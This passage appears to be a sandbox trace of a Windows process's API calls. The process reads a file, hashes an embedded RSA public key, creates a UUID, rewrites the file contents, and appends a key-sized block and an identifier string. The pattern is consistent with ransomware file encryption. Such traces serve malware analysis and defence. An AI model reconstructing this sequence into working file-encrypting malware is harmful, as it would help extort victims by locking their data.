dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.451] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e88 [0097.507] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x496, lpOverlapped=0x0) returned 1 [0097.508] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.508] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.508] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.508] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.508] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.509] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.509] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.509] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.509] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.509] GetLastError () returned 0x0 [0097.509] SetLastError (dwErrCode=0x0) [0097.509] GetLastError () returned 0x0 [0097.509] SetLastError (dwErrCode=0x0) [0097.510] GetLastError () returned 0x0 [0097.510] SetLastError (dwErrCode=0x0) [0097.510] GetLastError () returned 0x0 [0097.510] SetLastError (dwErrCode=0x0) [0097.510] GetLastError () returned 0x0 [0097.510] SetLastError (dwErrCode=0x0) [0097.510] GetLastError () returned 0x0 [0097.510] SetLastError (dwErrCode=0x0) [0097.510] GetLastError () returned 0x0 [0097.510] SetLastError (dwErrCode=0x0) [0097.510] GetLastError () returned 0x0 [0097.510] SetLastError (dwErrCode=0x0) [0097.510] GetLastError () returned 0x0 [0097.510] SetLastError (dwErrCode=0x0) [0097.510] GetLastError () returned 0x0 [0097.510] SetLastError (dwErrCode=0x0) [0097.510] GetLastError () returned 0x0 [0097.510] SetLastError (dwErrCode=0x0) [0097.510] GetLastError () returned 0x0 [0097.510] SetLastError (dwErrCode=0x0) [0097.511] GetLastError () returned 0x0 [0097.511] SetLastError (dwErrCode=0x0) [0097.511] GetLastError () returned 0x0 [0097.511] SetLastError (dwErrCode=0x0) [0097.511] GetLastError () returned 0x0 [0097.511] SetLastError (dwErrCode=0x0) [0097.511] GetLastError () returned 0x0 [0097.511] SetLastError (dwErrCode=0x0) [0097.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.511] GetLastError () returned 0x0 [0097.511] SetLastError (dwErrCode=0x0) [0097.511] GetLastError () returned 0x0 [0097.511] SetLastError (dwErrCode=0x0) [0097.511] GetLastError () returned 0x0 [0097.511] SetLastError (dwErrCode=0x0) [0097.511] GetLastError () returned 0x0 [0097.511] SetLastError (dwErrCode=0x0) [0097.512] GetLastError () returned 0x0 [0097.512] SetLastError (dwErrCode=0x0) [0097.512] GetLastError () returned 0x0 [0097.512] SetLastError (dwErrCode=0x0) [0097.512] GetLastError () returned 0x0 [0097.512] SetLastError (dwErrCode=0x0) [0097.512] GetLastError () returned 0x0 [0097.512] SetLastError (dwErrCode=0x0) [0097.512] GetLastError () returned 0x0 [0097.512] SetLastError (dwErrCode=0x0) [0097.512] GetLastError () returned 0x0 [0097.512] SetLastError (dwErrCode=0x0) [0097.512] GetLastError () returned 0x0 [0097.512] SetLastError (dwErrCode=0x0) [0097.512] GetLastError () returned 0x0 [0097.512] SetLastError (dwErrCode=0x0) [0097.512] GetLastError () returned 0x0 [0097.512] SetLastError (dwErrCode=0x0) [0097.512] GetLastError () returned 0x0 [0097.512] SetLastError (dwErrCode=0x0) [0097.512] GetLastError () returned 0x0 [0097.512] SetLastError (dwErrCode=0x0) [0097.512] GetLastError () returned 0x0 [0097.513] SetLastError (dwErrCode=0x0) [0097.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e88 [0097.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0097.513] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.513] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.513] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.513] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33332e8 [0097.513] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e88 | out: hHeap=0x630000) returned 1 [0097.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e88 [0097.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4a0) returned 0x333a888 [0097.513] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33332e8 | out: hHeap=0x630000) returned 1 [0097.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33332e8 [0097.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333f720 [0097.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x33211c0 [0097.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333f570 [0097.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x3319f80 [0097.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a550 [0097.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a598 [0097.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.514] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0097.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a550 | out: hHeap=0x630000) returned 1 [0097.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a598 | out: hHeap=0x630000) returned 1 [0097.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0097.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a598 [0097.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0097.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a550 [0097.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0097.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0097.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0097.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a598 | out: hHeap=0x630000) returned 1 [0097.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a550 | out: hHeap=0x630000) returned 1 [0097.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0097.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.515] GetCurrentThreadId () returned 0x42c [0097.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x695648 [0097.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3333208 [0097.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.515] GetCurrentThreadId () returned 0x42c [0097.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a550 [0097.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0097.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a598 [0097.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a580 [0097.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5c8 [0097.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0097.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0097.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0097.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0097.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a550 | out: hHeap=0x630000) returned 1 [0097.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a550 [0097.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0097.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0097.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0097.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0097.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0097.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0097.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a550 | out: hHeap=0x630000) returned 1 [0097.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0097.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0097.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0097.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0097.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5c8 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a598 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a580 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3333208 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3319f80 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333f570 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33332e8 | out: hHeap=0x630000) returned 1 [0097.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0097.520] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x491, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb14*=0x491, lpOverlapped=0x0) returned 1 [0097.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.520] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x496, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.520] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0097.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0097.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce208 | out: hHeap=0x630000) returned 1 [0097.520] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0097.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: 